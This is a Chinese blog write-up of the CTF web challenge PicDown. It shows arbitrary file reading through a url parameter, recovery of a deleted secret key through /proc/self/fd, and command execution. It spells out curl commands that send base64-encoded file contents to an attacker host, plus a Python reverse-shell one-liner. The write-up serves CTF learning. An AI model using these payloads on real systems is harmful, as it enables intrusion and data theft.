[网鼎杯 2020 白虎组]PicDown

最新推荐文章于 2024-05-12 08:52:10 发布
最新推荐文章于 2024-05-12 08:52:10 发布
阅读量103 收藏
点赞数
分类专栏: BUUCTF 文章标签: linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/127936789
版权

随便输入,发现有GET传参

思路:注入,文件包含,ssrf

尝试读取/etc/passwd

?url=/etc/passwd

试一下能不能直接读取flag

?url=/flag

其他的wp写到,本来的flag不在根目录,需要再找

思路:

/proc/self/environ
/proc/self/cmdline

读取app.py

?url=/proc/self/cwd/app.py
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

注意

@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"

    return res

这里有命令执行

要利用的路由为/no_one_know_the_manager,但是使用这个路由需要知道SECRET_KEY的内容。

注意关于SECRET_KEY的逻辑,虽然该文件在打开读取后被删除了,但是注意这个文件没有关闭,所以仍然可以通过/proc/self/fd/[num]访问对应文件(此处[num]代表一个未知的数值,需要从0开始遍历找出),这里在/proc/self/fd/3找到

下面就是利用vps反弹shell

?key=kipXyxqROil4KqaUtdJR7aE4vH7Gdlqafo3qVOq7lmk=&shell=curl IP:PORT/`ls /|base64`
?key=kipXyxqROil4KqaUtdJR7aE4vH7Gdlqafo3qVOq7lmk=&shell=curl IP:PORT/`cat /flag|base64`

或者

/no_one_know_the_manager?key=kipXyxqROil4KqaUtdJR7aE4vH7Gdlqafo3qVOq7lmk=&sehll=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

(ps:奇怪,我没有反弹成功!)

超级兵_140
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网鼎杯 白虎.zip
05-15
2020年第二届 网鼎杯网络安全大赛白虎 线下赛 真题 pwn reserve web misc 按照“网鼎杯”大赛两年一届的举办原则,第二届“网鼎杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
[网鼎杯 2020 白虎]PicDown(精讲)
记录学习,一起进步
03-24 658
[网鼎杯 2020 白虎]PicDown(精讲)
[网鼎杯 2020 白虎]PicDown(任意文件读取)
qq_62046696的博客
12-27 437
打开界面发现有一个get传参然后,尝试任意文件读取漏洞,/etc/passwd看一下,提示下载了一个jpg图片然后打不开只能用 010查看一下信息 看来是猜对了,然后 如果日记没删掉可以查看历史记录 .bash_history呃呃呃差不到,那就看一下现在的进程python 2的app.py文件,直接读取 源码出来了,解析一下 这一块可以分析一下,我们需要获得SECRET_KEY的值,然后使key等于,最后shell进行命令执行,但是看完以后那个文件被删除了,我们怎么获得呢?后面这个3怎么来的呢,
2020 网鼎杯web复现
fly夏天的博客
09-09 746
复现平台buuctf 白虎PicDown 本题是任意文件下载 尝试下载/proc/self/comline 得到提示 python2 app.py (原题应该是main.py这里可能是复现环境的差异) 下载app.py,代码审计 from flask import Flask, Response from flask import render_template from flask import request import os import urllib app = Flask
[BUUCTF] 集训第七天
Dannie01的博客
10-04 461
[CISCN2019 华北赛区 Day1 Web1]Dropbox 任意文件下载 phar反序列化 知识点 在下载的时候可以通过抓包修改文件名filename=…/…/index.php //class.php <?php error_reporting(0); $dbaddr = "127.0.0.1"; $dbuser = "root"; $dbpass = "root"; $dbname = "dropbox"; $db = new mysqli($dbaddr, $dbuser, $db
2020网鼎杯白虎赛题.zip
05-15
比赛试题附件,其中包括misc,re,crypto,pwn,web只有题目,没有环境,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
网页图片批量下载精灵v1.6特别版
07-28
图片批量下载精灵是一款从网站上下载图片的共享软件,它可以把网站上的图片都下载下来... 使用方法 安装原版,解压缩附件(PicDown-patch.rar)到目录下,用附件运行程序即可(即以后直接运行PicDown-patch.exe就可以了)~
网鼎杯白虎web - PicDown
weixin_43610673的博客
05-18 1690
看url考虑为目录穿越,读一下/etc/passwd (直接下载的话是个beautiful.jpg,要用notepad++打开) 再读一下/proc/self/cmdline ?url=app.py读一下,得到源码 from flask import Flask, Response from flask import render_template from flask import request import os import urllib app = Flask(__name__) SECR
/proc/self/目录的意义
热门推荐
dillanzhou的博客
09-28 1万+
我们都知道可以通过/proc/$pid/来获取指定进程的信息,例如内存映射、CPU绑定信息等等。如果某个进程想要获取本进程的系统信息,就可以通过进程的pid来访问/proc/$pid/目录。但是这个方法还需要获取进程pid,在fork、daemon等情况下pid还可能发生变化。为了更方便的获取本进程的信息,linux提供了/proc/self/目录,这个目录比较独特,不同的进程访问该目录时获得的信...
BUUCTF web第三页WP
东隅的博客
10-03 1118
简单来说,就是mt_srand(seed)分发种子,相当于进行产生随机数的初始化,然后通过mt_rand函数获得种子,但是这个随机数并不是真正的随机,他是有可预测性的,如果我们能获得种子,就一定程度上可以获得产生的随机数,根据这个随机数进行验证的部分就不安全了。这个题的逻辑就是在注册的地方进行过滤,我们绕过过滤登陆进去以后,有一个改密码的功能,他是用双引号闭合用户名进行改密码操作的,我们注册好的用户名双引号结尾就可以闭合,后面跟我们进行报错注入的代码就好,至于改密码怎么改是随便填的,重点在注册好的用户名。
[网鼎杯 2020 白虎]PicDown --proc文件的利用--python反弹shell
unexpectedthing的博客
11-15 887
文章目录前言wp参考 前言 这个题跟到wp做的,确实思路很像一个渗透过程了,值得好好学习。 wp 首先打开环境,F12,dirsearch和御剑都没有扫描出什么东西。然后输入一个输入框,填入抓包 有个url的GET参数,我们尝试SSRF url=file://127.0.0.1/flag.php或者php伪协议,都没有什么反应。然后尝试目录穿越 ?url=../../etc/passwd 说明存在文件包含,目录穿越可以实现 我们知道/proc文件系统,所以我们使用目录穿越爆出文件目录 ?url=../
linux下的调试工具gdb的详细使用介绍
qq_75270497的博客
05-06 1009
详细介绍在linux下使用gdb的方法,每个步骤都举例说明,适合复习和新手入门,希望能为能够帮助到大家。
linux下的进程通信
最新发布
羊羊羊
05-12 365
进程通信详解、管道、命名管道、匿名管道...
Linux生成密钥对并配置免密访问
u014516208的博客
05-07 342
先生成私钥,再生成公钥。
[网鼎杯 2020 白虎]picdown
03-16
picdown 是一个图片下载工具,可以通过输入图片链接,将图片下载到本地。它可以支持多线程下载,提高下载速度。同时,它还可以对下载的图片进行重命名和分类保存。这个工具在网站开发和图片爬虫方面都有很大的用处。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值